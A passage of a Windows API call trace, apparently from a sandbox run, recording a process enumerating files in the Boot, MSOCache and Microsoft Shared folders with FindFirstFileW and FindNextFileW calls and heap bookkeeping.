nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.693] FindNextFileW (in: hFindFile=0x662e28, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0032.694] FindClose (in: hFindFile=0x662e28 | out: hFindFile=0x662e28) returned 1 [0032.694] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39506e8 | out: hHeap=0x570000) returned 1 [0032.694] FindNextFileW (in: hFindFile=0x664268, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0032.694] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39506e8 [0032.694] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662e28 [0032.695] FindNextFileW (in: hFindFile=0x662e28, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.695] FindNextFileW (in: hFindFile=0x662e28, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.695] FindClose (in: hFindFile=0x662e28 | out: hFindFile=0x662e28) returned 1 [0032.695] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39506e8 | out: hHeap=0x570000) returned 1 [0032.695] FindNextFileW (in: hFindFile=0x664268, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0032.695] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39506e8 [0032.695] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662e28 [0032.695] FindNextFileW (in: hFindFile=0x662e28, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.695] FindNextFileW (in: hFindFile=0x662e28, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.695] FindClose (in: hFindFile=0x662e28 | out: hFindFile=0x662e28) returned 1 [0032.695] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39506e8 | out: hHeap=0x570000) returned 1 [0032.696] FindNextFileW (in: hFindFile=0x664268, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0032.696] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39506e8 [0032.696] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662e28 [0032.696] FindNextFileW (in: hFindFile=0x662e28, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.696] FindNextFileW (in: hFindFile=0x662e28, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.697] FindClose (in: hFindFile=0x662e28 | out: hFindFile=0x662e28) returned 1 [0032.697] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39506e8 | out: hHeap=0x570000) returned 1 [0032.697] FindNextFileW (in: hFindFile=0x664268, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0032.697] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39506e8 [0032.697] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662e28 [0032.697] FindNextFileW (in: hFindFile=0x662e28, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.697] FindNextFileW (in: hFindFile=0x662e28, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.697] FindClose (in: hFindFile=0x662e28 | out: hFindFile=0x662e28) returned 1 [0032.697] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39506e8 | out: hHeap=0x570000) returned 1 [0032.697] FindNextFileW (in: hFindFile=0x664268, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0032.697] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39506e8 [0032.697] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6652b0 [0032.859] FindNextFileW (in: hFindFile=0x6652b0, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.862] FindNextFileW (in: hFindFile=0x6652b0, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.143] FindNextFileW (in: hFindFile=0x3ef1080, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.143] FindNextFileW (in: hFindFile=0x3ef1080, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0033.143] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x3ee0058 [0033.143] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1100 [0033.145] FindNextFileW (in: hFindFile=0x3ef1100, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.145] FindNextFileW (in: hFindFile=0x3ef1100, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa623330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x266a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUI.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0033.145] FindNextFileW (in: hFindFile=0x3ef1100, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUI.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0033.146] FindClose (in: hFindFile=0x3ef1100 | out: hFindFile=0x3ef1100) returned 1 [0033.146] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ee0058 | out: hHeap=0x570000) returned 1 [0033.146] FindNextFileW (in: hFindFile=0x3ef1080, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa160f00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUISet.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0033.146] FindClose (in: hFindFile=0x3ef1080 | out: hFindFile=0x3ef1080) returned 1 [0033.146] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ed0050 | out: hHeap=0x570000) returned 1 [0033.147] FindNextFileW (in: hFindFile=0x665270, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0033.147] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x3ed0050 [0033.150] FindNextFileW (in: hFindFile=0x3ef1080, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.150] FindNextFileW (in: hFindFile=0x3ef1080, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34ae1a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x34ae1a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe0c2860, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0034.840] FindNextFileW (in: hFindFile=0x3ef1200, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d4dc20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.840] FindNextFileW (in: hFindFile=0x3ef1200, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0034.840] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x3f024c0 [0034.840] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\*", lpFindFileData=0x353ee18 | out: lpFindFileData=0x353ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef12c0 [0034.841] FindNextFileW (in: hFindFile=0x3ef12c0, lpFindFileData=0x353ee18 | out: lpFindFileData=0x353ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.841] FindNextFileW (in: hFindFile=0x3ef12c0, lpFindFileData=0x353ee18 | out: lpFindFileData=0x353ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd5024ea0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x2760, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTOInstallerUI.dll", cAlternateFileName="VSTOIN~1.DLL")) returned 1 [0034.842] FindNextFileW (in: hFindFile=0x3ef12c0, lpFindFileData=0x353ee18 | out: lpFindFileData=0x353ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTOLoaderUI.dll", cAlternateFileName="VSTOLO~1.DLL")) returned 1 [0034.842] FindNextFileW (in: hFindFile=0x3ef12c0, lpFindFileData=0x353ee18 | out: lpFindFileData=0x353ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTOLoaderUI.dll", cAlternateFileName="VSTOLO~1.DLL")) returned 0 [0034.842] FindClose (in: hFindFile=0x3ef12c0 | out: hFindFile=0x3ef12c0) returned 1 [0034.842] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f024c0 | out: hHeap=0x570000) returned 1 [0034.842] FindNextFileW (in: hFindFile=0x3ef1200, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc251dc00, ftCreationTime.dwHighDateTime=0x1cab7c7, ftLastAccessTime.dwLowDateTime=0x5e4b68d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc251dc00, ftLastWriteTime.dwHighDateTime=0x1cab7c7, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTOInstaller.config", cAlternateFileName="VSTOIN~1.CON")) returned 1 [0034.842] FindClose (in: hFindFile=0x3ef1200 | out: hFindFile=0x3ef1200) returned 1 [0034.842] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fda4f0 | out: hHeap=0x570000) returned 1 [0034.994] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x2d148, dwReserved0=0x0, dwReserved1=0x0, cFileName="vstoee.dll", cAlternateFileName="")) returned 1 [0034.995] FindClose (in: hFindFile=0x3ef1300 | out: hFindFile=0x3ef1300) returned 1 [0034.995] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ee0058 | out: hHeap=0x570000) returned 1 [0034.995] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Folders", cAlternateFileName="WEBFOL~1")) returned 1 [0034.995] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*", lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1280 [0035.463] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: 